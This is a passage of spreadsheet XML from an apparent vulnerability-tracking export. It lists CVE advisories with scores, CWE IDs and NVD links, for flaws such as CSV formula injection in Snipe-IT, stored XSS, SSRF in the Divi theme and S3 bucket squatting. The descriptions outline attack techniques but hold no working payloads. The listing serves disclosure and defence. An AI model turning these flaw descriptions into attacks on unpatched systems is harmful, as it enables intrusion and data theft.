          <t>Snipe-IT through 8.6.3 does not neutralize formula elements in the "unaccepted assets" acceptance report CSV export. ReportsController::postAssetAcceptanceReport builds the CSV by hand (stripping commas and joining rows manually) and, unlike the six sibling exports in the same controller, never applies League\Csv\EscapeFormula or honors the config('app.escape_formulas') setting. An authenticated low-privilege user with ordinary create/edit rights on any record whose free-text fields appear in the report (asset name/tag, company name, category, model, or assignee display name) can set such a field to a value beginning with =, +, -, @, tab, or CR. When a user with reports.view privileges requests the export (POST /reports/unaccepted_assets) for a pending checkout acceptance referencing the poisoned record and opens the resulting CSV in Excel, LibreOffice Calc, or Google Sheets, the injected content is evaluated as a formula in the downloader's spreadsheet context, enabling data exfiltration (e.g., HYPERLINK/WEBSERVICE) or, on legacy Windows Excel configurations, DDE command execution. Fixed in 8.7.0.</t>
        </is>
      </c>
      <c r="M5400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86742</t>
        </is>
      </c>
    </row>
    <row r="5401">
      <c r="A5401" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86745</t>
        </is>
      </c>
      <c r="C5401" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5401" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5401" s="5" t="inlineStr"/>
      <c r="F5401" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5401" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5401" s="5" t="inlineStr"/>
      <c r="I5401" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5401" s="5" t="inlineStr"/>
      <c r="K5401" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="L5401" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT is an IT asset management application. In Snipe-IT master-branch builds after 8.6.3 (the code was never included in a tagged release), SettingsController::downloadLocationScopingReport streams the FMCS location-scoping mismatch report (GET /admin/settings/location-scoping-report.csv) through a bare fputcsv() call without applying League\Csv\EscapeFormula, unlike the other CSV exports which honor config('app.escape_formulas'). An authenticated user with ordinary create/edit rights can place a spreadsheet formula in free-text fields that appear in the report (item name, asset tag, serial, item or location company name, location name) and arrange for the record to be FMCS-mismatched so it is included in the export. When a superuser downloads the report and opens it in Excel, LibreOffice Calc, or Google Sheets with formula evaluation enabled and external-content warnings dismissed or disabled, cells beginning with =, +, -, @, tab, or CR are executed in the victim's spreadsheet context, enabling data exfiltration (e.g., HYPERLINK/WEBSERVICE) or, on Windows Excel, legacy DDE command execution. This issue is fixed in version 8.7.0.</t>
        </is>
      </c>
      <c r="M5401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86745</t>
        </is>
      </c>
    </row>
    <row r="5402">
      <c r="A5402" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86763</t>
        </is>
      </c>
      <c r="C5402" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5402" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5402" s="5" t="inlineStr"/>
      <c r="F5402" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5402" s="5" t="inlineStr"/>
      <c r="H5402" s="5" t="inlineStr"/>
      <c r="I5402" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5402" s="5" t="inlineStr"/>
      <c r="K5402" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5402" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions &gt;= 7.0.12 and &lt;= 8.6.3 contain an authorization bypass in the Livewire importer component (App\Livewire\Importer, mounted at the imports.index route). The component only checked the broad 'import' ability at mount time, while its files() and activeFile() computed properties queried the imports table with no owner or company scope. As a result, any authenticated non-superuser holding the import permission could view every Import record on the instance (original filename, file_path, filesize, import_type and creation timestamp) and could invoke the selectFile($id) Livewire action with any auto-incrementing Import ID to load another user's record, exposing its stored preview data (header_row column headers and first_row, the first data row of the CSV). Because import CSVs commonly contain personal data, asset serial numbers and license keys, this discloses sensitive information; in Full Multiple Companies Support (FMCS) deployments the disclosure also crosses company/tenant boundaries. Impact is limited to preview data rather than the full CSV file, and superusers were unaffected. Fixed in version 8.7.0, which scopes non-superuser reads to imports owned by the caller.</t>
        </is>
      </c>
      <c r="M5402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86763</t>
        </is>
      </c>
    </row>
    <row r="5403">
      <c r="A5403" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86772</t>
        </is>
      </c>
      <c r="C5403" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5403" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5403" s="5" t="inlineStr"/>
      <c r="F5403" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5403" s="5" t="inlineStr"/>
      <c r="H5403" s="5" t="inlineStr"/>
      <c r="I5403" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5403" s="5" t="inlineStr"/>
      <c r="K5403" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5403" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 contain a stored cross-site scripting vulnerability in DepartmentPresenter::formattedNameLink() where department names are rendered unescaped in the fallback branch for users without departments.view permission. Users with departments.edit permission can inject malicious scripts into department names that execute in the browsers of all department members when they load their My Assets page.</t>
        </is>
      </c>
      <c r="M5403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86772</t>
        </is>
      </c>
    </row>
    <row r="5404">
      <c r="A5404" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87083</t>
        </is>
      </c>
      <c r="C5404" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5404" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5404" s="5" t="inlineStr"/>
      <c r="F5404" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5404" s="5" t="inlineStr"/>
      <c r="H5404" s="5" t="inlineStr"/>
      <c r="I5404" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5404" s="5" t="inlineStr"/>
      <c r="K5404" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-502</t>
        </is>
      </c>
      <c r="L5404" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in tile-ai tilelang up to 0.1.14. This impacts the function KernelCache._load_kernel_from_disk of the file tilelang/cache/kernel_cache.py of the component Kernel Cache. Executing a manipulation can lead to deserialization. The attack may be performed from remote. This patch is called 11ec2397fe942e8b422d026af4a03d6e0a55ae6c. Applying a patch is advised to resolve this issue. Based on the release information, the fix has not been included in any official release yet.</t>
        </is>
      </c>
      <c r="M5404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87083</t>
        </is>
      </c>
    </row>
    <row r="5405">
      <c r="A5405" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87912</t>
        </is>
      </c>
      <c r="C5405" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5405" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5405" s="5" t="inlineStr"/>
      <c r="F5405" s="5" t="inlineStr"/>
      <c r="G5405" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H5405" s="5" t="inlineStr"/>
      <c r="I5405" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5405" s="5" t="inlineStr"/>
      <c r="K5405" s="5" t="inlineStr">
        <is>
          <t>CWE-283, CWE-341</t>
        </is>
      </c>
      <c r="L5405" s="5" t="inlineStr">
        <is>
          <t>A missing S3 bucket ownership verification in the AWS Security Agent plugin in Amazon aws-agents-for-devsecops before 1.1.0 might allow remote attackers to obtain the private source archive of a scanned workspace, including credentials and infrastructure state contained in that archive, via a pre-registered storage bucket whose name is derived from a publicly known account identifier.
To remediate this issue, users should upgrade to version 1.1.0. Users should also verify that the scan output bucket in their account is owned by their own account, because upgrading does not release a bucket name that a third party has already registered.</t>
        </is>
      </c>
      <c r="M5405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87912</t>
        </is>
      </c>
    </row>
    <row r="5406">
      <c r="A5406" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87913</t>
        </is>
      </c>
      <c r="C5406" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5406" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5406" s="5" t="inlineStr"/>
      <c r="F5406" s="5" t="inlineStr"/>
      <c r="G5406" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H5406" s="5" t="inlineStr"/>
      <c r="I5406" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5406" s="5" t="inlineStr"/>
      <c r="K5406" s="5" t="inlineStr">
        <is>
          <t>CWE-283, CWE-341</t>
        </is>
      </c>
      <c r="L5406" s="5" t="inlineStr">
        <is>
          <t>A missing S3 bucket ownership verification in the AWS Security Agent MCP server before 0.2.0 version might allow remote attackers to obtain the private source archive of a scanned workspace, including credentials and infrastructure state contained in that archive, via a pre-registered storage bucket whose name is derived from a publicly known account identifier.
To remediate this issue, users should upgrade to version 0.2.0. Users should also verify that the scan output bucket in their account is owned by their own account, because upgrading does not release a bucket name that a third party has already registered.</t>
        </is>
      </c>
      <c r="M5406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87913</t>
        </is>
      </c>
    </row>
    <row r="5407">
      <c r="A5407" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87928</t>
        </is>
      </c>
      <c r="C5407" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5407" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5407" s="5" t="inlineStr"/>
      <c r="F5407" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5407" s="5" t="inlineStr"/>
      <c r="H5407" s="5" t="inlineStr"/>
      <c r="I5407" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5407" s="5" t="inlineStr"/>
      <c r="K5407" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L5407" s="5" t="inlineStr">
        <is>
          <t>MaxSite CMS versions 0.94 through 109.6 contain a cross-site scripting vulnerability in the admin_page upload handler that allows any logged-in user to upload HTML files. Attackers can upload HTML containing malicious scripts to the uploads/_pages/ directory, which executes in visitors' browsers when the file is accessed, enabling persistent stored cross-site scripting attacks.</t>
        </is>
      </c>
      <c r="M5407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87928</t>
        </is>
      </c>
    </row>
    <row r="5408">
      <c r="A5408" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88921</t>
        </is>
      </c>
      <c r="C5408" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5408" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5408" s="5" t="inlineStr"/>
      <c r="F5408" s="5" t="inlineStr"/>
      <c r="G5408" s="5" t="inlineStr"/>
      <c r="H5408" s="5" t="inlineStr"/>
      <c r="I5408" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5408" s="5" t="inlineStr"/>
      <c r="K5408" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-79</t>
        </is>
      </c>
      <c r="L5408" s="5" t="inlineStr">
        <is>
          <t>MISP contains an HTML injection vulnerability in the MISPElementHTMLFormatterTool component, which is responsible for rendering MISP element references (attributes, objects, and tags) into inline HTML during PDF report export via the convert_markdown_to_pdf module. The attribute(), objectAttribute(), object(), and tag() methods interpolated user-controlled fields (attribute type, attribute value, object name, object relation, tag name, tag colour, and tag text colour) directly into HTML templates without applying HTML entity encoding. An authenticated user with the ability to create or modify MISP attributes, objects, or tags could embed arbitrary HTML markup in these fields. When a report containing such elements was exported to PDF, the unescaped content was rendered as live HTML rather than inert text, potentially injecting script tags, breaking the document structure, or altering the visual content of the exported report. Additionally, the attribute() method contained a template with hardcoded sample values ("domain-ip" and "google.com") instead of format placeholders, meaning every plain attribute reference in a PDF displayed the sample text rather than the actual indicator value, constituting a data-integrity defect in the exported document. The vulnerability requires an authenticated actor with write access to MISP elements and a subsequent PDF export of a report referencing those elements. The security impact is primarily to the integrity of the exported document and, depending on the HTML-to-PDF rendering engine, potential execution of injected markup during the conversion step.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M5408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88921</t>
        </is>
      </c>
    </row>
    <row r="5409">
      <c r="A5409" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89045</t>
        </is>
      </c>
      <c r="C5409" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5409" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5409" s="5" t="inlineStr"/>
      <c r="F5409" s="5" t="inlineStr"/>
      <c r="G5409" s="5" t="inlineStr"/>
      <c r="H5409" s="5" t="inlineStr"/>
      <c r="I5409" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5409" s="5" t="inlineStr"/>
      <c r="K5409" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L5409" s="5" t="inlineStr">
        <is>
          <t>zstd-jni versions 1.4.8-4 through 1.5.7-13 fail to validate negative length parameters in ZstdInputStreamNoFinalizer.read(), allowing attackers to trigger infinite loops. Attackers can pass negative length values to cause the read method to spin indefinitely while holding the stream monitor, blocking all other threads from accessing the stream.</t>
        </is>
      </c>
      <c r="M5409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89045</t>
        </is>
      </c>
    </row>
    <row r="5410">
      <c r="A5410" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89148</t>
        </is>
      </c>
      <c r="C5410" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5410" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5410" s="5" t="inlineStr"/>
      <c r="F5410" s="5" t="inlineStr"/>
      <c r="G5410" s="5" t="inlineStr"/>
      <c r="H5410" s="5" t="inlineStr"/>
      <c r="I5410" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5410" s="5" t="inlineStr"/>
      <c r="K5410" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5410" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains an open redirect in objects/playlistSort.php. Because the endpoint is not a *.json.php script, AVideo's automatic CSRF guard (autoCSRFGuard()/forbidIfIsUntrustedRequest()) does not run, and when the request includes the sort parameter the script issues a Location header set to the unvalidated $_SERVER['HTTP_REFERER'] value without calling isSafeRedirectURL(). A remote unauthenticated attacker can therefore induce a logged-in user who can manage the targeted playlist to submit a cross-origin POST with a crafted Referer, causing the victim's playlist to be reordered and the victim's browser to be redirected from a trusted AVideo URL to an attacker-controlled site for phishing. No patched version is available.</t>
        </is>
      </c>
      <c r="M5410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89148</t>
        </is>
      </c>
    </row>
    <row r="5411">
      <c r="A5411" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89246</t>
        </is>
      </c>
      <c r="C5411" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5411" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5411" s="5" t="inlineStr"/>
      <c r="F5411" s="5" t="inlineStr"/>
      <c r="G5411" s="5" t="inlineStr"/>
      <c r="H5411" s="5" t="inlineStr"/>
      <c r="I5411" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5411" s="5" t="inlineStr"/>
      <c r="K5411" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="L5411" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a CSV formula injection vulnerability in the myComments.download.php endpoint that fails to sanitize spreadsheet formula prefixes in comment text. Authenticated users can inject formulas starting with =, +, -, or @ characters that execute when administrators or video owners open the exported CSV file in spreadsheet applications.</t>
        </is>
      </c>
      <c r="M5411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89246</t>
        </is>
      </c>
    </row>
    <row r="5412">
      <c r="A5412" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18238</t>
        </is>
      </c>
      <c r="C5412" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D5412" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5412" s="5" t="inlineStr"/>
      <c r="F5412" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5412" s="5" t="inlineStr"/>
      <c r="H5412" s="5" t="inlineStr"/>
      <c r="I5412" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5412" s="5" t="inlineStr"/>
      <c r="K5412" s="5" t="inlineStr">
        <is>
          <t>CWE-126, CWE-1288</t>
        </is>
      </c>
      <c r="L5412" s="5" t="inlineStr">
        <is>
          <t>The rpcap client code that processes a RPCAP_MSG_PACKET message received from the server incorrectly validates its headers.  A malicious server can send a crafted message and cause the client to treat up to 20 bytes of the client process memory beyond the end of the buffer as if it was a part of the captured packet.</t>
        </is>
      </c>
      <c r="M5412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18238</t>
        </is>
      </c>
    </row>
    <row r="5413">
      <c r="A5413" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4361</t>
        </is>
      </c>
      <c r="C5413" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D5413" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5413" s="5" t="inlineStr"/>
      <c r="F5413" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5413" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H5413" s="5" t="inlineStr"/>
      <c r="I5413" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5413" s="5" t="inlineStr"/>
      <c r="K5413" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5413" s="5" t="inlineStr">
        <is>
          <t>The Divi theme for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.27.6. This is due to the `et_pb_set_video_oembed_thumbnail_resolution()` function using `wp_remote_get()` instead of `wp_safe_remote_get()` to fetch a remote image URL, which does not restrict requests to private or reserved IP ranges. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application server. The response body is not returned to the attacker (blind SSRF), but two oracles exist: a status oracle (the returned URL string differs depending on whether the target responded with HTTP 200) and a timing oracle (response time varies by target reachability).</t>
        </is>
      </c>
      <c r="M5413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4361</t>
        </is>
      </c>
    </row>
    <row r="5414">
      <c r="A5414" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55067</t>
        </is>
      </c>
      <c r="C5414" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D5414" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5414" s="5" t="inlineStr"/>
      <c r="F5414" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5414" s="5" t="inlineStr"/>
      <c r="H5414" s="5" t="inlineStr"/>
      <c r="I5414" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J5414" s="5" t="inlineStr"/>
      <c r="K5414" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5414" s="5" t="inlineStr">
        <is>
          <t>Vikunja is an open-source self-hosted task management platform. Prior to 2.4.0, POST /api/v1/projects/{project}/views/{view}/buckets/{bucket} allows the request body project_view_id value to be mass assigned by Bucket.Update in pkg/models/kanban.go. The permission check validates that the bucket currently belongs to the URL project and view but does not validate the body selected destination view, allowing any authenticated user to relocate an attacker-owned bucket into another tenant’s Kanban view. The injected bucket retains attacker-controlled content and ownership, enabling cross-tenant defacement. This issue is fixed in version 2.4.0.</t>
        </is>
      </c>
      <c r="M5414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55067</t>
        </is>
      </c>
    </row>
    <row r="5415">
      <c r="A5415" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55425</t>
        </is>
      </c>
      <c r="C5415" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D5415" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5415" s="5" t="inlineStr"/>
      <c r="F5415" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5415" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5415" s="5" t="inlineStr"/>
      <c r="I5415" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J5415" s="5" t="inlineStr"/>
      <c r="K5415" s="5" t="inlineStr">
        <is>
          <t>CWE-213</t>
        </is>
      </c>
      <c r="L5415" s="5" t="inlineStr">
        <is>
          <t>Graylog is a free and open log management platform. From 7.1.0 until 7.1.4 and 7.2.0-alpha.2, the System Catalog entity titles endpoint in graylog2-server/src/main/java/org/graylog2/rest/resources/system/contentpacks/titles/EntityTitleServiceImpl.java allows an authenticated user to request composite display fields without verifying that every selected field is readable. A user can retrieve protected values, including the password hash on a readable user record; ordinary users are limited to their own permitted records, while administrators can retrieve hashes for all users. This issue is fixed in versions 7.1.4 and 7.2.0-alpha.2.</t>
        </is>
      </c>
      <c r="M5415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55425</t>
        </is>
      </c>
    </row>
    <row r="5416">
      <c r="A5416" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62293</t>
        </is>
      </c>
      <c r="C5416" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D5416" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5416" s="5" t="inlineStr"/>
      <c r="F5416" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5416" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5416" s="5" t="inlineStr"/>
      <c r="I5416" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J5416" s="5" t="inlineStr"/>
      <c r="K5416" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-79</t>
        </is>
      </c>
      <c r="L5416" s="5" t="inlineStr">
        <is>
          <t>HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to 6.9.11, the hidden scan command concatenates attacker-controlled Implementation Guide titles, profile titles, and source references into scan.html without escaping in Scanner.java. As a result, a user who scans an attacker-supplied IG/profile and then opens or publishes the generated local/CI HTML report can trigger stored cross-site scripting, executing attacker-controlled JavaScript in the report's browser context. This issue is fixed in version 6.9.11.</t>
        </is>
      </c>
      <c r="M5416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62293</t>
        </is>
      </c>
    </row>
    <row r="5417">
      <c r="A5417" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70588</t>
        </is>
      </c>
      <c r="C5417" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D5417" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5417" s="5" t="inlineStr"/>
      <c r="F5417" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5417" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H5417" s="5" t="inlineStr"/>
      <c r="I5417" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J5417" s="5" t="inlineStr"/>
      <c r="K5417" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5417" s="5" t="inlineStr">
        <is>
          <t>Ghost is a Node.js content management system. From 5.26.0 until 6.54.1, the Universal Import feature in Ghost Admin failed to properly sanitize imported content resulting in XSS in post content. This issue is fixed in version 6.54.1.</t>
        </is>
      </c>
      <c r="M5417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70588</t>
        </is>
      </c>
    </row>
    <row r="5418">
      <c r="A5418" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71201</t>
        </is>
      </c>
      <c r="C5418" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D5418" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5418" s="5" t="inlineStr"/>
      <c r="F5418" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5418" s="5" t="inlineStr"/>
      <c r="H5418" s="5" t="inlineStr"/>
      <c r="I5418" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J5418" s="5" t="inlineStr"/>
      <c r="K5418" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5418" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Ironic through 38.0.0, a project reader that makes a crafted request to Ironic can return Portgroups assigned to Nodes owned or leased by another project.</t>
        </is>
      </c>
      <c r="M5418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71201</t>
        </is>
      </c>
    </row>
    <row r="5419">
      <c r="A5419" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72976</t>
        </is>
      </c>
      <c r="C5419" s="5" t="n">
        <v>5</v>
      </c>
      <c r="D5419" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5419" s="5" t="inlineStr"/>
      <c r="F5419" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5419" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H5419" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I5419" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5419" s="5" t="inlineStr"/>
      <c r="K5419" s="5" t="inlineStr">
